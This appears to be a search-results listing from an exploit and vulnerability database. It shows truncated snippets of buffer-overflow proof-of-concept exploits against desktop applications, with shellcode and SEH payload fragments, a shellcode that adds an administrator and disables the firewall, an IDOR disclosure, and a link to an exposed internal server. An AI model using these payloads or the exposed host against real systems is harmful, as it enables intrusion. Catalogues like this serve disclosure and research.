11967 matches found
ManageEngine Password Manager Pro Default Credentials
The remote ManageEngine Password Manager Pro web administration interface uses a known set of default credentials. An attacker can use these to gain access to the remote host. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. include'deprecatednasllevel.inc'; include'compat.inc'; if descriptio...
MyBB < 1.6.13 Multiple Vulnerabilities
Binary data 8629.prm...
Mail.ru: http://217.69.136.200/?p=2&c=Fetcher%20cluster&h=fetcher1.mail.ru
Something tasty is exposed again here: http://217.69.136.200/?p=2&c=Fetcher%20cluster&h=fetcher1.mail.ru http://217.69.136.200/lib/ in case it matters, this is: el7-fetcher1.g.smailru.net...
Design/Logic Flaw
Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: None. Reason: This ID is frequently used as an example of the 2014 CVE-ID syntax change, which allows more than 4 digits in the sequence number. Notes: See references...
CVE-2014-100000
CVE-2014-100000 is rejected/not used per the Initial Description.
Obfuscated Shellcode Windows x64 - 1218 Bytes Add Administrator User/Pass ALI/ALI & Add ALI To RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start Terminal Service
Obfuscated Shellcode Windows x64 - 1218 Bytes Add Administrator User/Pass ALI/ALI & Add ALI To RDP Group & Enable RDP From Registry & STOP Fire... Author: Ali Razmjoo Title: Obfuscated Shellcode Windows x64 1218 Bytes Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP Fro...
Kenward-Zipper-1.4
Exploit Title : Kenward zipper v1.4 0day Stack Buffer Overflow PoC exploit Date : 23/3/2010 Bug found by : corelanc0d3r http://www.corelan.be:8800/ Author : mrme http://net-ninja.net/ Software Link : http://www.trans4mind.com/personaldevelopment/zipper/ Version : 1.4 ldfheader =...
GSM-SIM-Utility-5.15
Exploit Title : GSM SIM Utility sms file Local SEH BoF Date : June 28, 2010 Author : chap0 www.seek-truth.net Download Link : http://download.cnet.com/GSM-SIM-Utility/3000-185084-10396246.html?tag=mncol Version : 5.15 import time sc ="d9eb9bd97424f431d2b27a31c964" "8b71308b760c8b761c8b46088b7e"...
Winamp-5.572---Local-BoF
Exploit Title: Winamp v5.572 Local BoF Exploit Win7 ASLR and DEP Bypass Date: June 26, 2010 Author: Node Software Link: http://download.nullsoft.com/winamp/client/winamp5572fullemusic-7plusen-us.exe Badchars: \x00\xff\x5c\x2f\x0a\x0d\x20 version = "Winamp 5.572" rop = "A" 540 Offset rop +=...
FieldNotes-32-5.0
Title: FieldNotes 32 v5.0 SEH 0day Date: 25/06/2010 Author: TecR0c - http://tecninja.net/blog aka Rocco Calvi Found by: TecR0c - http://twitter.com/TecR0c Advisory: http://www.corelan.be:8866/advisories.php?id=CORELAN-10-053 msg = TITLE=Corelan TEXT="TecR0c pwned you"...
WM-Downloader-3.1.2.2-2010.04.15
Exploit Title: WM Downloader 3.1.2.2 2010.04.15 Buffer Overflow SEH Date: 2010-07-28 Author: fdisk @fdiskyou e-mail: fdiskyou at deniable.org payload = "\x41" 43485 payload += "\xeb\x16\x90\x90" jump payload += "\xb4\x15\xbb\x01" ppr - WDCodec00.dll payload += "\x90" 16 windows/exec - 227 bytes...
QQPlayer-2.3.696.400p1-smi
A different SEH addr might be necessary for XP SP3 ENG. Make sure EAX aligns to the shellcode before decoding. head =''' ''' payload=head+junk+nseh+seh+adjust+shellcode+junk+foot fobj = open"poc.smi","w" fobj.writepayload fobj.close...
MUSE-4.9.0.006-(.pls)
Exploit Title: MUSE v4.9.0.006 .pls Local Universal Buffer Overflow SEH Date: August 17, 2010 Author: Glafkos Charalambous glafkos@astalavistadotcom payload = "\x41" 1376 payload += "\xeb\x06\x90\x90" payload += "\xAA\x0c\x02\x10" 10020CAA sdll.dll universal payload += "\x90" 16 win32exec -...
Xion-Player-1.0.125
Script provided as is without any warranty. Use for educational purposes only. Do not use this code to do anything illegal ! Corelan does not want anyone to use this script outputfile="corelanc0d3r.m3u" offsettonseh=250 affected by the m3u path length ! junk = "A" offsettonseh nseh="\x41\x45"...
A-PDF-All-to-MP3-Converter-1.1.0
Exploit Title: A-PDF All to MP3 Converter v.1.1.0 Universal Local SEH Exploit Date: September 18, 2010 Author: modpr0be import struct junk1 = 'A' 4132 nseh = "\xeb\x06\x90\x90" seh = struct.pack'L', 0x00408B44 ppr nops2 = "\x90" 12 metasploit payload windows/exec cmd=calc | msfencode -e...
DJ-Studio-Pro-8.1.3.2.1
DJ Studio Pro Version 8.1.3.2.1 SEH 0 day Author Abhishek Lyall - abhilyallatgmaildotcom, infoataslitsecuritydotcom Web - http://www.aslitsecurity.com/ filename = "ASL.pls" windows/exec - CMD=calc.exe shellcode = "\x41\x42\x48\x49\x41\x42\x48\x49" Egg Hunted...
Excel-RTD-Memory-Corruption
Analysis: http://www.abysssec.com Vendor: http://www.microsoft.com Impact: Critical import sys def main: try: fdR = open'src.xls', 'rb+' strTotal = fdR.read str1 = strTotal:4509 str2 = strTotal5013:15000 str3 = strTotal15800: eip = "\xAd\x57\x00\x30" pop pop ret jmp = "\xF7\xC2\x03\x30" call esp...
Foxit-Reader-4.1.1-EggHunter
Date: 15 Nov 10 Author: dookie at offsec.com App: Foxit Reader 4.1.1 preamble =...
Vimeo: Vimeo.com Insecure Direct Object References Reset Password
Hello, my name is Toufik Airane. This is Responsible Disclosure and Silent Disclosure. Thank you for opening a bug bounty program! Please find a proof of concept for an IDOR attack on the famous vimeo.com. With this IDOR, an attacker can reset any password, of any account, and take control of it. Please, find...
Design/Logic Flaw
Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2014-9323. Reason: This candidate is a reservation duplicate of CVE-2014-9323. Notes: All CVE users should reference CVE-2014-9323 instead of this candidate. All references and descriptions in this candidate have been removed to...